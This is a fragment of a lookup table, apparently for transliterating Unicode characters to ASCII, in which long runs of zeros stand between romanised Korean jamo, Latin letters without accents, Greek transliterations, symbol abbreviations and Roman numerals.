0,0,0,0,0,"g","kk","gs","n","nj","nh","d","l","lg","lm","lb","ls","lt","lp","lh","m","b","bs","s","ss","ng","j","ch","k","t","p","h",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"A","AE",0,"B","C","D","D","E",0,0,"J","K","L","M",0,"O",0,0,0,0,0,0,0,0,"P",0,0,"T","U",0,0,0,"V","W","Z",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"ue","b","d","f","m","n","p","r","r","s","t","z",0,0,0,"th","I",0,"p","U",0,"b","d","f","g","k","l","m","n","p","r","s",0,"v","x","z","a",0,"d","e","e",0,0,"i",0,0,"u",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"A","a","B","b","B","b","B","b","C","c","D","d","D","d","D","d","D","d","D","d","E","e","E","e","E","e","E","e","E","e","F","f","G","g","H","h","H","h","H","h","H","h","H","h","I","i","I","i","K","k","K","k","K","k","L","l","L","l","L","l",
"L","l","M","m","M","m","M","m","N","n","N","n","N","n","N","n","O","o","O","o","O","o","O","o","P","p","P","p","R","r","R","r","R","r","R","r","S","s","S","s","S","s","S","s","S","s","T","t","T","t","T","t","T","t","U","u","U","u","U","u","U","u","U","u","V","v","V","v","W","w","W","w","W","w","W","w","W","w","X","x","X","x","Y","y","Z","z","Z","z","Z","z","h","t","w","y","a","s","s","s","SS",0,"A","a","A","a","A","a","A","a","A","a","A","a","A","a","A","a","A","a","A","a","A","a","A","a","E","e","E","e","E",
"e","E","e","E","e","E","e","E","e","E","e","I","i","I","i","O","o","O","o","O","o","O","o","O","o","O","o","O","o","O","o","O","o","O","o","O","o","O","o","U","u","U","u","U","u","U","u","U","u","U","u","U","u","Y","y","Y","y","Y","y","Y","y","LL","ll","V","v","Y","y","a","ha","a","ha","a","ha","a","ha","A","HA","A","HA","A","HA","A","HA","e","he","e","he","e","he",0,0,"E","HE","E","HE","E","HE",0,0,"e","he","e","he","e","he","e","he","E","HE","E","HE","E","HE","E","HE","i","hi","i","hi","i","hi","i","hi","I","HI","I","HI","I","HI",
"I","HI","o","ho","o","ho","o","ho",0,0,"O","HO","O","HO","O","HO",0,0,"y","hy","y","hy","y","hy","y","hy",0,"HY",0,"HY",0,"HY",0,"HY","o","ho","o","ho","o","ho","o","ho","O","HO","O","HO","O","HO","O","HO","a","a","e","e","e","e","i","i","o","o","y","y","o","o",0,0,"ai","hai","ai","hai","ai","hai","ai","hai","AI","HAI","AI","HAI","AI","HAI","AI","HAI","ei","hei","ei","hei","ei","hei","ei","hei","EI","HEI","EI","HEI","EI","HEI","EI","HEI","oi","hoi","oi","hoi","oi","hoi","oi","hoi","OI","HOI","OI","HOI","OI","HOI","OI","HOI","a","a","ai","ai","ai",0,"a","ai","A","A","A","A","AI",0,"i",
0,0,0,"ei","ei","ei",0,"e","ei","E","E","E","E","EI",0,0,0,"i","i","i","i",0,0,"i","i","I","I","I","I",0,0,0,0,"y","y","y","y","r","rh","y","y","Y","Y","Y","Y","RH",0,0,0,0,0,"oi","oi","oi",0,"o","oi","O","O","O","O","OI",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"CE",0,"Cr",0,0,0,0,"Pts",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"Rs","TL",0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"C",0,0,0,0,0,0,0,"g","H","x","H","h",0,"I","I","L","l",0,"N","No",0,0,"P","Q","R","R","R","Rx",0,0,"TEL",0,0,"Z",0,"O",0,"Z",0,"K","A","B","C",0,"e","E","F",0,"M","o",0,0,0,0,"i",0,"FAX",0,0,0,0,0,0,
0,0,0,"D","d","e","i","j",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,"I","II","III","IV","V","VI","VII","VIII","IX","X","XI","XII","L","C","D","M","i","ii","iii","iv","v","vi","vii","viii","ix","x","xi","xii","l","c","d","m",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
